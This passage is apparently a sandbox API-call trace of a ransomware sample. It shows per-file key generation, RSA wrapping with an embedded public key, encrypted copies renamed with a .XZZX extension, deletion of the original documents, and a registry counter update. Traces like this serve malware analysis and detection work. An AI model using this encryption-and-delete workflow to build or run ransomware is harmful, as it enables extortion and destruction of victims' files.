lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x3f8e438*=0xe581, lpOverlapped=0x0) returned 1 [0036.662] SetFilePointer (in: hFile=0x444, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe581 [0036.662] WriteFile (in: hFile=0x444, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.663] SetFilePointer (in: hFile=0x444, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe586 [0036.663] WriteFile (in: hFile=0x444, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x1c, lpOverlapped=0x0) returned 1 [0036.663] SetFilePointer (in: hFile=0x444, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe5a2 [0036.663] WriteFile (in: hFile=0x444, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.663] SetFilePointer (in: hFile=0x444, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe5a7 [0036.663] SetErrorMode (uMode=0x1) returned 0x1 [0036.663] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0036.663] OutputDebugStringW (lpOutputString="end") [0036.663] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0036.663] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0036.663] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eb860) returned 1 [0036.664] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb860, dwCertEncodingType=0x1, pInfo=0x3dd1f28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1f58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1f60*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x324e78) returned 1 [0036.664] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.665] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0036.665] CryptEncrypt (in: hKey=0x324e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0036.665] CryptEncrypt (in: hKey=0x324e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb8e8*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb8e8*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0036.665] WriteFile (in: hFile=0x444, lpBuffer=0x3eb8e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb8e8*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0036.665] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0036.665] WriteFile (in: hFile=0x444, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.665] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0036.666] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0036.666] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x450) returned 0x0 [0036.666] RegQueryValueExW (in: hKey=0x450, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x12, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0036.666] RegCloseKey (hKey=0x450) returned 0x0 [0036.666] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x450) returned 0x0 [0036.667] RegSetValueExW (in: hKey=0x450, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x13, cbData=0x4 | out: lpData=0x3f8dfec*=0x13) returned 0x0 [0036.667] RegCloseKey (hKey=0x450) returned 0x0 [0036.667] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.667] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.667] CloseHandle (hObject=0x444) returned 1 [0036.668] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0036.668] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0036.668] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B92naCEgJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b92nacegj.docx")) returned 1 [0036.669] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B92naCEgJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b92nacegj.docx")) returned 0 Thread: id = 110 os_tid = 0x660 [0036.669] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.669] lstrcpyW (in: lpString1=0x42cf460, lpString2="de6NX.xlsx" | out: lpString1="de6NX.xlsx") returned="de6NX.xlsx" [0036.669] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.669] SetErrorMode (uMode=0x1) returned 0x1 [0036.670] lstrcpyW (in: lpString1=0x42cf860, lpString2="de6NX.xlsx" | out: lpString1="de6NX.xlsx") returned="de6NX.xlsx" [0036.670] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x4903a282, Data2=0xa9b1, Data3=0x486e, Data4=([0]=0xa0, [1]=0xeb, [2]=0x96, [3]=0x10, [4]=0xdd, [5]=0x72, [6]=0x43, [7]=0xdb))) returned 0x0 [0036.670] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\de6NX.xlsx") returned 54 [0036.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0036.670] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1CB2DE23002B20E4903A282342F9656.XZZX") returned 81 [0036.670] StrStrW (lpFirst="de6NX.xlsx", lpSrch="XZZX") returned 0x0 [0036.670] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\de6NX.xlsx", dwFileAttributes=0x20) returned 1 [0036.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\de6NX.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\de6nx.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x440 [0036.670] ReadFile (in: hFile=0x440, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0xe50a, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x42ce418*=0xe50a, lpOverlapped=0x0) returned 1 [0036.670] CloseHandle (hObject=0x440) returned 1 [0036.671] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0036.671] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0036.671] SetErrorMode (uMode=0x1) returned 0x1 [0036.671] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0036.671] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb970) returned 1 [0036.674] CryptGenKey (in: hProv=0x3eb970, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0037.111] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0037.111] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0037.111] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.112] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0037.112] CryptDestroyKey (hKey=0x324c38) returned 1 [0037.112] CryptReleaseContext (hProv=0x3eb9f8, dwFlags=0x0) returned 0 [0037.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1CB2DE23002B20E4903A282342F9656.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e1cb2de23002b20e4903a282342f9656.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0037.113] WriteFile (in: hFile=0x45c, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0xe50a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x42ce438*=0xe50a, lpOverlapped=0x0) returned 1 [0037.114] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe50a [0037.114] WriteFile (in: hFile=0x45c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.114] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe50f [0037.114] WriteFile (in: hFile=0x45c, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x14, lpOverlapped=0x0) returned 1 [0037.114] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe523 [0037.114] WriteFile (in: hFile=0x45c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.115] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe528 [0037.115] SetErrorMode (uMode=0x1) returned 0x1 [0037.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0037.115] OutputDebugStringW (lpOutputString="end") [0037.115] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0037.115] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0037.115] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3eba80) returned 1 [0037.116] CryptImportPublicKeyInfo (in: hCryptProv=0x3eba80, dwCertEncodingType=0x1, pInfo=0x3dd20c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd20f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2100*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x324c38) returned 1 [0037.116] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.116] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0037.116] CryptEncrypt (in: hKey=0x324c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0037.116] CryptEncrypt (in: hKey=0x324c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ebb08*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ebb08*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0037.117] WriteFile (in: hFile=0x45c, lpBuffer=0x3ebb08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3ebb08*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0037.117] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0037.117] WriteFile (in: hFile=0x45c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.117] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0037.117] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0037.117] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x460) returned 0x0 [0037.117] RegQueryValueExW (in: hKey=0x460, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x13, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0037.117] RegCloseKey (hKey=0x460) returned 0x0 [0037.117] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x460) returned 0x0 [0037.117] RegSetValueExW (in: hKey=0x460, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x14, cbData=0x4 | out: lpData=0x42cdfec*=0x14) returned 0x0 [0037.117] RegCloseKey (hKey=0x460) returned 0x0 [0037.117] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.118] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.118] CloseHandle (hObject=0x45c) returned 1 [0037.119] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0037.120] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0037.120] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\de6NX.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\de6nx.xlsx")) returned 1 [0037.121] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\de6NX.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\de6nx.xlsx")) returned 0 Thread: id = 111 os_tid = 0x8d0 [0036.890] lstrcpyA (in: lpString1=0x43cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.890] lstrcpyW (in: lpString1=0x43cf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0036.890] lstrcpyW (in: lpString1=0x43ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.890] SetErrorMode (uMode=0x1) returned 0x1 [0036.890] lstrcpyW (in: lpString1=0x43cf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0036.890] CoCreateGuid (in: pguid=0x43ce440 | out: pguid=0x43ce440*(Data1=0xc7ec8f1a, Data2=0xe7f7, Data3=0x4a67, Data4=([0]=0xbc, [1]=0x34, [2]=0x7, [3]=0x29, [4]=0xac, [5]=0xba, [6]=0xb8, [7]=0x13))) returned 0x0 [0036.890] wsprintfW (in: param_1=0x43cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0036.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x43cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0036.890] wsprintfW (in: param_1=0x43ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned 81 [0036.890] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0036.890] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", dwFileAttributes=0x20) returned 1 [0036.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0036.891] ReadFile (in: hFile=0x450, lpBuffer=0x3e18640, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x43ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e18640*, lpNumberOfBytesRead=0x43ce418*=0x192, lpOverlapped=0x0) returned 1 [0036.891] CloseHandle (hObject=0x450) returned 1 [0036.892] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0036.892] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0036.892] SetErrorMode (uMode=0x1) returned 0x1 [0036.892] lstrcpyW (in: lpString1=0x43ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0036.893] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb9f8) returned 1 [0036.895] CryptGenKey (in: hProv=0x3eb9f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324cb8) returned 1 [0037.162] CryptExportKey (in: hKey=0x324cb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x43ce41c | out: pbData=0x0*, pdwDataLen=0x43ce41c*=0x94) returned 1 [0037.163] CryptExportKey (in: hKey=0x324cb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x43ce41c | out: pbData=0x3ec0000*, pdwDataLen=0x43ce41c*=0x94) returned 1 [0037.163] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.163] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0037.163] CryptDestroyKey (hKey=0x324cb8) returned 1 [0037.163] CryptReleaseContext (hProv=0x3ebb90, dwFlags=0x0) returned 0 [0037.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5a5e8816436aba61c7ec8f1a47a79ea9.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x448 [0037.164] WriteFile (in: hFile=0x448, lpBuffer=0x3e18640*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e18640*, lpNumberOfBytesWritten=0x43ce438*=0x192, lpOverlapped=0x0) returned 1 